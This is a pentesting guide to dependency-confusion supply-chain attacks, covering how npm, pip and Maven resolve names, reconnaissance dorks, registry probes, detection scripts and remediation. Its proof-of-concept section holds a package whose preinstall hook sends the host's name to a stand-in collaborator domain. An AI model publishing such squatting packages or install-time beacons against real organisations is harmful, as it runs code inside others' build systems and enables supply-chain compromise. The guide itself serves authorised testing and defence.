Dependency Confusion: Internal Package Squatting, Scoped Packages, and Detection
Dependency confusion is a supply-chain attack that exploits how package managers resolve names across multiple sources. When an organization references an internally-named package — one that lives only in a private registry — but the build pipeline is also configured to fall back to a public registry, an attacker can publish a malicious package of the same name to the public index. If the public version carries a higher version number, the resolver often prefers it, silently pulling attacker-controlled code into a trusted build. Alex Birsan's 2021 research demonstrated this against dozens of major companies, earning six-figure bug bounties and proving that the flaw is a misconfiguration in resolution logic rather than a bug in any single tool.
For pentesters, dependency confusion sits at the intersection of OSINT and code execution: the hard part is discovering the internal package names, and the proof-of-concept is usually a harmless DNS or HTTP callback fired at install time. This guide covers internal package squatting, the subtleties of scoped packages, detection across npm, PyPI, and Maven ecosystems, and the controls that actually close the gap. Everything here assumes explicit written authorization — publishing packages or triggering callbacks against an organization you do not have scope for is illegal, and even a benign PoC executes code on someone else's infrastructure.
How Resolution Confusion Happens
Package managers were designed to merge multiple sources into one logical namespace. That convenience is the root cause. Consider an npm project whose .npmrc points at a private registry but does not pin every dependency to it:
# .npmrc — misconfigured: no scope binding, public fallback intact
registry=https://registry.npmjs.org/
//npm.internal.corp/:_authToken=${TOKEN}
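If package.json lists "corp-auth-utils": "^1.2.0" and that name exists only on the internal registry, npm resolves the unscoped name through the default registry entry, which here is the public one; a proxy that merges both registries behaves the same way. Publish a higher version of corp-auth-utils publicly and the resolver picks the highest version that satisfies the range: the attacker's. A caret range such as ^1.2.0 admits only 1.x releases, so a 99.0.0 release wins only where the range is loose or unpinned. The same pattern appears in pip when a private index is added with --extra-index-url (which merges indexes and picks the highest version across all of them) rather than --index-url, and in Maven/Gradle when an internal groupId can also be claimed on Maven Central or a misconfigured proxy.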
The three preconditions are constant: (1) an internal package name that is not registered on the public index, (2) a build that resolves against the public index as a fallback, and (3) a version-precedence rule that favors the highest semver. Break any one and the attack fails.
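The version-precedence precondition can be illustrated with a minimal sketch. It is not npm's or pip's actual resolver: the caret matching is deliberately simplified (major version 1 or higher, no prereleases), and the function names and candidate list are hypothetical.

```javascript
// Sketch of "highest satisfying version wins" across merged sources.
// Simplified on purpose: real resolvers also handle prereleases, 0.x
// caret ranges, tildes, and compound ranges.

function parse(version) {
  return version.split('.').map(Number);
}

function compare(a, b) {
  const pa = parse(a);
  const pb = parse(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

// "^1.2.0" admits >=1.2.0 and <2.0.0; "*" admits anything.
function satisfies(version, range) {
  if (range === '*') return true;
  const base = range.slice(1); // drop the leading "^"
  return parse(version)[0] === parse(base)[0] && compare(version, base) >= 0;
}

// candidates: [{ version, source }] gathered from every configured source
function resolve(range, candidates) {
  const matching = candidates.filter((c) => satisfies(c.version, range));
  matching.sort((a, b) => compare(b.version, a.version)); // highest first
  return matching[0] || null;
}

const candidates = [
  { version: '1.2.3', source: 'internal' },
  { version: '1.99.0', source: 'public' },
  { version: '99.0.0', source: 'public' },
];

console.log(resolve('^1.2.0', candidates)); // the public 1.99.0 entry
console.log(resolve('*', candidates)); // the public 99.0.0 entry
```

In both cases the internal 1.2.3 loses, which is why removing the public source from the candidate set is more robust than trying to out-version an attacker.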
Internal Package Squatting
Squatting is the act of registering an unclaimed internal name on a public registry before the defender does. Attackers harvest candidate names from anything an organization leaks publicly:
- Frontend bundles: webpack output frequently embeds the original module paths and require() names of internal packages in comments and source maps.
- Leaked manifests: a package.json, package-lock.json, requirements.txt, pom.xml, or yarn.lock committed to a public repo lists exact internal dependency names.
- Public CI logs: Travis, CircleCI, and GitHub Actions logs print resolution errors like 404 Not Found - @acme/billing-sdk that reveal both name and scope.
- Docker images: published images on Docker Hub often retain a full node_modules tree or a pip freeze output.
GitHub code search is the highest-yield source. You can build the right queries with the Search Dork Generator to surface manifests that reference an internal scope:
# GitHub dorks to enumerate internal package names (authorized scope only)
org:acme-corp filename:package.json "@acme/"
org:acme-corp filename:requirements.txt "acme-"
"registry.npm.acme.internal" filename:.npmrc
org:acme-corp filename:pom.xml "<groupId>com.acme"
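Once a dork surfaces a manifest, the candidate names still have to be separated from ordinary public dependencies. The following is a minimal sketch that filters a package.json by scope or name prefix; the helper name internalCandidates and the sample manifest are hypothetical, and the @acme scope and acme- prefix are carried over from the dorks above.

```javascript
// Hypothetical helper: collect dependency names from a package.json string
// that look internal, judged by a scope ("@acme") or a name prefix ("acme-").
function internalCandidates(manifestText, { scope, prefix }) {
  const manifest = JSON.parse(manifestText);
  const sections = [
    'dependencies',
    'devDependencies',
    'optionalDependencies',
    'peerDependencies',
  ];
  const names = new Set();
  for (const section of sections) {
    for (const name of Object.keys(manifest[section] || {})) {
      const scoped = Boolean(scope) && name.startsWith(`${scope}/`);
      const prefixed = Boolean(prefix) && name.startsWith(prefix);
      if (scoped || prefixed) names.add(name);
    }
  }
  return [...names].sort();
}

// Made-up manifest standing in for a leaked file
const leaked = JSON.stringify({
  dependencies: { '@acme/billing-sdk': '^2.0.0', express: '^4.18.0' },
  devDependencies: { 'acme-logger': '1.0.0', jest: '^29.0.0' },
});

console.log(internalCandidates(leaked, { scope: '@acme', prefix: 'acme-' }));
// [ '@acme/billing-sdk', 'acme-logger' ]
```

A prefix match is only a heuristic: names that carry no organizational marker (internal-config, for example) still need manual review.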
Once you have a candidate, confirm it is genuinely unclaimed on the public index before reporting. A clean 404 means the name is squattable; a 200 means someone — defender or attacker — already holds it. The curl Command Builder helps you craft the registry probe with the right headers:
# Does the name exist publicly? 404 = squattable, 200 = taken
curl -s -o /dev/null -w "%{http_code}\n" https://registry.npmjs.org/corp-auth-utils
curl -s -o /dev/null -w "%{http_code}\n" https://pypi.org/pypi/acme-internal-client/json
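When probing many names, two details are easy to get wrong: scoped npm names need the slash encoded, and PyPI treats names as equivalent under PEP 503 normalization. A small sketch of the URL construction and status interpretation follows. The function names are hypothetical, and treating every status other than 200 or 404 as inconclusive is a conservative assumption rather than documented registry behavior.

```javascript
// Build the public metadata URL for a package name.
function probeUrl(ecosystem, name) {
  if (ecosystem === 'npm') {
    // Scoped names keep the "@" but encode the slash: @acme/x -> @acme%2Fx
    return `https://registry.npmjs.org/${name.replace('/', '%2F')}`;
  }
  if (ecosystem === 'pypi') {
    // PEP 503 normalization: lowercase, runs of "-", "_", "." become "-"
    const normalized = name.toLowerCase().replace(/[-_.]+/g, '-');
    return `https://pypi.org/pypi/${normalized}/json`;
  }
  throw new Error(`unsupported ecosystem: ${ecosystem}`);
}

// Interpret the HTTP status of a probe.
function classify(status) {
  if (status === 404) return 'unclaimed';
  if (status === 200) return 'claimed';
  return 'inconclusive'; // rate limits, 5xx, intercepting proxies: retry first
}

console.log(probeUrl('npm', '@acme/billing-sdk'));
console.log(probeUrl('pypi', 'Acme_Internal.Client'));
console.log(classify(404));
```

Normalizing the PyPI name up front means acme_internal_client and acme-internal-client are checked as the same project, which matters because an attacker only needs to claim one spelling.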
Scoped Packages: The Critical Nuance
Scoped npm packages (@scope/name) are the single most important defensive primitive, and the most misunderstood. A scope like @acme can be reserved on npmjs.org by the organization. Once reserved, no one else can publish under that scope on the public registry — the resolution-confusion door is closed for every package in it, because the public registry will reject an attacker's publish attempt outright.
The trap is partial adoption. Teams that reserve @acme but still ship a handful of legacy unscoped internal packages (acme-logger, internal-config) remain fully exposed on exactly those names. Worse, some teams assume that merely using a scope in package.json provides protection; it does not unless the scope is reserved on the public registry and the resolver is told that scope maps only to the private registry:
# .npmrc — correct scope binding: @acme NEVER hits the public registry
@acme:registry=https://npm.internal.corp/
//npm.internal.corp/:_authToken=${TOKEN}
registry=https://registry.npmjs.org/
With that binding, npm install @acme/anything resolves only against the internal registry. The public registry is never consulted for the @acme scope, so even an unreserved scope name cannot be confused — provided the scope binding is present in every project and CI environment. As a pentester, the finding is twofold: unscoped internal names that resolve publicly, and scoped names whose scope is neither reserved nor bound.
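Checking for the binding across many repositories is easy to script. The sketch below reads .npmrc text and reports which registry, if any, a scope is bound to. The function name scopeRegistry is hypothetical, and the parser covers only plain key=value lines and comments, not every feature of npm's config loader.

```javascript
// Return the registry bound to a scope in .npmrc text, or null if unbound.
function scopeRegistry(npmrcText, scope) {
  for (const raw of npmrcText.split(/\r?\n/)) {
    const line = raw.trim();
    // .npmrc is ini-style: "#" and ";" start comments
    if (!line || line.startsWith('#') || line.startsWith(';')) continue;
    const eq = line.indexOf('=');
    if (eq === -1) continue;
    const key = line.slice(0, eq).trim();
    const value = line.slice(eq + 1).trim();
    if (key === `${scope}:registry`) return value;
  }
  return null;
}

// The two configurations shown in this guide
const misconfigured = [
  'registry=https://registry.npmjs.org/',
  '//npm.internal.corp/:_authToken=${TOKEN}',
].join('\n');

const bound = [
  '@acme:registry=https://npm.internal.corp/',
  '//npm.internal.corp/:_authToken=${TOKEN}',
  'registry=https://registry.npmjs.org/',
].join('\n');

console.log(scopeRegistry(misconfigured, '@acme')); // null
console.log(scopeRegistry(bound, '@acme')); // https://npm.internal.corp/
```

A null result for a scope the project actually depends on is the reportable condition, since those packages then resolve through the default registry.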
Building a Safe Proof-of-Concept
A responsible PoC proves code execution at install time without exfiltrating data or persisting. npm runs lifecycle scripts during install; a single out-of-band callback is enough to demonstrate the issue. Keep it benign and uniquely tagged:
{
"name": "corp-auth-utils",
"version": "99.0.0",
"description": "Authorized dependency-confusion PoC. Contact: [email protected]",
"scripts": {
"preinstall": "node poc.js"
}
}
// poc.js — non-destructive beacon: hostname only, no env dump, no persistence
const os = require('os');
const https = require('https');
const id = `${os.hostname()}.poc-CONFUSION-1234.collab.example`;
https.get(`https://${id}/`, () => {}).on('error', () => {});
The DNS/HTTP callback fires from inside the victim's build network, which is the proof. Do not harvest environment variables, process.env, build secrets, or AWS metadata — that crosses from demonstration into data theft and exceeds almost every authorization. Set a low version that is still higher than the internal one rather than 99.0.0 if you want to minimize blast radius, and unpublish immediately after the report is acknowledged. Equivalent hooks exist elsewhere: PyPI's setup.py executes during pip install from sdist, and Maven can trigger code via plugin execution in the build lifecycle.
Detection Across Ecosystems
Detection is about comparing the set of required names against the set of publicly claimed names and flagging the gap. A simple, scriptable approach: extract every dependency from the lockfile, then probe each name on the corresponding public index.
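# npm: list direct + transitive deps, then check public registry
# (.packages covers lockfileVersion 2 and 3, .dependencies covers version 1)
jq -r '[(.packages // {} | keys[] | select(test("node_modules/")) | sub("^.*node_modules/"; "")),
        (.dependencies // {} | keys[])] | unique[]' package-lock.json | while read -r pkg; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://registry.npmjs.org/$pkg")
  [ "$code" = "404" ] && echo "SQUATTABLE: $pkg"
done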
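# Python: any requirement not on PyPI is a confusion candidate
while read -r pkg; do
  # drop comments, version specifiers, extras, and environment markers
  name=$(printf '%s\n' "$pkg" | sed -E 's/#.*//; s/[][=<>~!; ].*//')
  # skip blank lines and pip options such as -r or --index-url
  case "$name" in ''|-*) continue ;; esac
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://pypi.org/pypi/$name/json")
  [ "$code" = "404" ] && echo "SQUATTABLE: $name"
done < requirements.txt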
Names that 404 publicly but are clearly internal dependencies are your hits. While reviewing leaked manifests and source, also run a credentials pass — internal .npmrc and CI configs frequently leak registry auth tokens, and the Secret Scanner will catch hardcoded npm tokens, PyPI credentials, and cloud keys in the same files. Maven requires checking each groupId/artifactId against Central and any configured proxies, since a permissive proxy that mirrors Central can reintroduce confusion even when the names exist privately.
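For the Maven case, the probe target follows from the repository layout: the groupId's dots become path separators, followed by the artifactId, with a maven-metadata.xml file at the artifact level. The sketch below builds that URL for Maven Central. The helper names and the com.acme:billing-sdk coordinate are hypothetical, and the base URL would need to be swapped for each proxy under test.

```javascript
// Split "groupId:artifactId[:version]" into its parts.
function parseCoordinate(coordinate) {
  const [groupId, artifactId, version] = coordinate.split(':');
  if (!groupId || !artifactId) {
    throw new Error(`not a Maven coordinate: ${coordinate}`);
  }
  return { groupId, artifactId, version: version || null };
}

// Maven repositories lay artifacts out as groupId (dots -> slashes) / artifactId.
function mavenMetadataUrl(groupId, artifactId, base = 'https://repo1.maven.org/maven2') {
  const groupPath = groupId.split('.').join('/');
  return `${base}/${groupPath}/${artifactId}/maven-metadata.xml`;
}

const { groupId, artifactId } = parseCoordinate('com.acme:billing-sdk:1.4.0');
console.log(mavenMetadataUrl(groupId, artifactId));
// https://repo1.maven.org/maven2/com/acme/billing-sdk/maven-metadata.xml
```

Running the same coordinates against each configured proxy's base URL shows whether that proxy would serve an upstream copy of an internal name.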
Remediation and Defenses
Closing dependency confusion is a configuration problem with clear, durable fixes. Prioritize in this order:
- Reserve your scope/namespace publicly. Register the @org npm scope on npmjs.org and claim internal names on PyPI so attackers cannot publish them. This is the single highest-leverage control.
- Bind scopes to the private registry. Use @scope:registry= in every .npmrc so scoped packages never consult the public index. Distribute the config via CI base images, not per-developer machines.
- Avoid merged indexes. In pip, prefer a single curated --index-url (an internal proxy that explicitly mirrors approved public packages) over --extra-index-url, which merges sources and picks the highest version anywhere.
- Use a controlling proxy. Configure Artifactory, Nexus, or Verdaccio so that it does not automatically fall through to the public registry for known-internal names. Enable namespace/scope blocking so internal names are never sourced upstream.
- Pin and verify. Commit lockfiles, enable integrity hashes (npm's integrity, pip hash-checking mode), and require signature or provenance verification where supported.
- Disable install scripts in CI. Run npm ci --ignore-scripts where feasible to remove the most direct code-execution path during builds.
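The pin-and-verify control can be backed by a CI check that every locked package was fetched from an approved host. What follows is a minimal sketch, assuming a package-lock.json with a packages map (lockfileVersion 2 or 3) and a setup where all traffic is expected to go through the internal registry. The function name and sample lockfile are hypothetical.

```javascript
// Report lockfile entries whose tarball came from a host outside the allowlist.
function unexpectedSources(lockText, allowedHosts) {
  const lock = JSON.parse(lockText);
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (!entry.resolved) continue; // the root project entry has no URL
    let url;
    try {
      url = new URL(entry.resolved);
    } catch {
      continue; // not a parseable URL
    }
    // Only registry tarballs are checked; git and file sources need their own review.
    if (url.protocol !== 'https:' && url.protocol !== 'http:') continue;
    if (!allowedHosts.includes(url.host)) {
      findings.push({ path, host: url.host, hasIntegrity: Boolean(entry.integrity) });
    }
  }
  return findings;
}

// Made-up lockfile: one package from the internal registry, one from the public one
const sampleLock = JSON.stringify({
  lockfileVersion: 3,
  packages: {
    '': { name: 'app', version: '1.0.0' },
    'node_modules/@acme/billing-sdk': {
      version: '2.0.0',
      resolved: 'https://npm.internal.corp/@acme/billing-sdk/-/billing-sdk-2.0.0.tgz',
      integrity: 'sha512-placeholder',
    },
    'node_modules/corp-auth-utils': {
      version: '99.0.0',
      resolved: 'https://registry.npmjs.org/corp-auth-utils/-/corp-auth-utils-99.0.0.tgz',
    },
  },
});

console.log(unexpectedSources(sampleLock, ['npm.internal.corp']));
```

Failing the build on a non-empty result turns a silent resolution change into a visible review item.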
Dependency confusion endures because the fix lives in build configuration that nobody owns by default, and because partial mitigations create a false sense of safety. A reserved-but-unbound scope, a single legacy unscoped package, or one CI job using --extra-index-url is enough to reopen the hole. For pentesters, that means the highest-value deliverable is rarely the PoC callback itself — it is the precise inventory of which internal names resolve publicly and which scopes are unreserved, mapped against authorized scope so the defender can close every gap in one pass.